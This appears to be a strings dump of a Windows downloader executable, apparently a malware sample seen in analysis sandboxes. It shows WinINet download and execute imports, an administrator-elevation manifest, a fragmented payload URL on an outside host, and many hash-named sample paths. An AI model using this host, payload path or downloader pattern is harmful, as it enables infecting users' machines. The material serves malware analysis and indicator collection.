L!This program cannot be run in DOS mode.
(((()(((Rich(
.rdata
@.links
@.reloc
SVW3S]H
ulh 18
_3^@[xSP
@SMTQutPuX
bSETPW
SWSulh
SM`A<uX
Et}t N
WSuhulSuhh
dM8QVh
SSSSh08
,MlE$08
ElElMXkpUl;T
}H]tkp
SSPVu4
uL9~lu
0]tSudE$PSSF PSu\
|N9~lu.j
^M\QMPQjPu\
VEPPjuh
3SSSSuh
]p3SE0PEpPh
]T]t=08
ETPupu`V
ETPupu`uh
M`Ep+;t
G>Mtr~
9}pEL@`3
Vu\RVh
EDudEpu@
YjlES08
SE PupudV
EPPh08
@hIEH;
QwQwRwtQw-w5QwPPw+QwRwfQwgQwQwBQwQw7
QwQwSRw!SRwQwQw
application/*
text/*
RtlDecompressBuffer
InternetReadFile
HttpQueryInfoW
HttpSendRequestW
InternetSetOptionW
InternetQueryOptionW
HttpOpenRequestA
InternetConnectA
InternetOpenW
WININET.dll
HeapDestroy
GetCurrentDirectoryW
FreeLibrary
GetProcAddress
LoadLibraryW
HeapFree
DeleteFileW
CloseHandle
WriteFile
lstrcmpW
ReadFile
lstrlenW
GetFileSize
CreateFileW
GetTempPathW
GetModuleFileNameW
HeapAlloc
HeapCreate
ExitProcess
GetModuleHandleW
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHELL32.dll
globalbmis.com
/acp/use
rs/Targ-
1405USmp0.enc
wp-conte
nt/uploa
ds/2014/,02"
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
i0v0000000000
1#1@1J1111111
2(2=2C2U2\2a2l222222222&3w3333
4,4E44
545f5z555555555
k i l f 1 . e x e
U p d a t e s d o w n l o a d e r
r n t d l l . d l l
b u d h a . e x e
C : \ 8 d 7 2 9 d 6 0 d 5 f b 1 9 d a 6 a 2 b 9 6 a f 6 2 a 0 1 3 4 d b 9 e 4 a 0 0 9 9 b c 7 1 f e 9 a 9 b a 4 9 f 3 c 0 b d 5 8 a a
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ d 6 8 1 2 d e 3 9 2 2 f 1 0 8 9 e 3 a e 4 a b 4 1 2 5 d f c 8 3 a 5 c a a 0 a 0 2 e b a 1 f 6 c 0 1 0 3 6 4 4 3 3 a 3 7 0 3 b 3
c : \ t a s k \ 9 C D 1 4 F C 1 0 9 F 2 7 2 F A 7 A E 8 F 6 2 C 0 5 8 D 4 0 5 D . e x e
c : \ t a s k \ A 5 4 9 9 2 E 6 5 F 7 B 9 D 6 F 4 2 C 7 F 5 E 8 5 B 5 2 7 C F 4 . e x e
c : \ t a s k \ C 5 9 2 E B 5 A F C 1 0 E 8 B 3 3 9 E 9 0 2 F 3 8 3 F 5 A D 4 2 . e x e
c : \ t a s k \ 2 B 0 7 0 E 2 0 8 3 E 1 7 4 8 3 A C 3 9 D 8 3 0 7 A 6 E 1 1 5 6 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ a b e 5 7 0 b c 6 e 2 5 b a 8 a 6 3 a 0 2 2 e 1 9 b f c f 6 f 9 . v i r u s . e x e
C : \ c 1 1 9 1 8 3 d b 8 4 7 9 1 0 8 e e b 5 7 d 5 f e 0 3 2 a 3 d 2 e c a 3 3 3 1 d 8 3 e 1 f b 2 6 1 8 3 7 b 5 1 f 8 6 d 3 3 3 5 5
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 5 7 7 b 2 3 8 9 3 0 0 d 4 6 3 e e 2 7 5 8 6 9 3 4 0 4 6 c 3 6 1 0 1 c a d f 7 2 3 1 0 1 0 1 9 4 b b 9 0 c 6 f 4 2 f d c 2 5 f 7 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 0 e 6 4 9 a a b a e a 8 4 6 f 0 c d 4 e 1 8 9 6 3 3 3 7 e b c 2 b 9 d 1 3 b 5 3 f a 6 c e 4 7 8 9 3 f 9 f 9 a a 4 d 6 d f d e 2 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 8 1 a b 9 b 9 5 b f 9 5 c 9 7 5 6 a 8 1 c 3 a a 9 8 2 6 a a 3 2 e 5 1 c 0 2 2 d 4 e 4 2 0 3 9 a 5 5 5 e 2 d 5 7 e 2 0 4 3 3 3 f . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 2 2 a 9 f 9 c 2 a 9 b 5 3 e 8 0 b 1 1 6 3 1 b a f d f c 2 3 9 5 8 4 b b f 6 2 3 8 9 2 9 f 0 f 6 d c 9 d f 3 1 f c 5 a 4 2 4 6 8 . e x e
C : \ c 7 2 a 9 a 7 0 e 6 2 e b 9 d 9 b 0 a 4 1 8 b 6 6 f 3 d 9 3 6 2 8 4 7 d 9 a d 9 e 1 4 5 0 9 4 a 9 5 a 7 3 0 6 8 e 2 5 b 2 d 2 f
C : \ 3 2 1 4 8 7 0 f 0 8 1 d b d e a 9 d 2 b 8 f 8 e 3 c b 1 e b d 5 5 c 5 6 d e 2 e 8 a 7 a 2 4 a e 9 a e f 6 1 7 4 c 8 a c 7 3 7 2
C : \ C Q B p D 5 E T . e x e
C : \ c 1 7 2 3 f 2 a b c 3 2 a 9 e 9 5 b e 7 a 6 8 4 2 d 7 2 f 4 3 d a d 1 2 5 2 8 1 a 1 8 6 f f e 4 c 3 9 2 b 7 e d 5 9 8 a 4 f 0 a
C : \ 3 7 d 7 3 f b 1 9 0 a f a a e a 7 e 4 3 d c 7 b e 2 2 3 0 7 0 1 8 4 4 c f b d 0 0 5 6 2 8 a 2 0 3 7 b 7 1 f 2 6 e 2 a 6 6 3 2 0
C : \ 7 b 8 e b b c 8 a e a b 1 c a 8 4 e 7 a 8 1 b a 1 9 c 5 a 9 8 d b 2 8 c b 8 1 4 4 0 b 0 e f 7 5 7 d e 6 1 a 9 5 a 7 1 d 7 f 6 f
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ 5 d 1 6 2 b 0 7 9 7 b b f 5 3 3 f 1 8 b 1 f 6 1 9 c d 9 c a 1 b 0 d e 5 0 7 f e d a 1 2 a c 9 0 4 1 1 3 f 3 5 2 8 3 6 7 9 e 3 8
C : \ e e a c c 9 e 0 8 c 1 d 3 8 d 4 8 3 a 6 2 e 5 8 9 f d a 3 2 d c 6 3 4 8 4 9 a 4 0 3 d 8 6 0 1 e 8 7 0 d 1 0 6 f 0 3 5 7 5 3 c f
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ 9 f 0 e 6 b d 2 d 5 c 7 5 1 6 1 d 9 6 5 3 b 5 0 d 0 1 6 d a 7 4 d 8 2 e 8 b 7 d 8 d 3 f 1 7 5 8 9 4 9 5 8 c 6 c 3 d d 7 8 c 9 b
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ U s e r s \ r . v u l t \ A p p D a t a \ L o c a l \ T e m p \ c 6 3 d 3 7 5 0 2 5 b f c f 8 c 4 3 e e 6 8 5 e d f c 5 7 6 5 e . e x e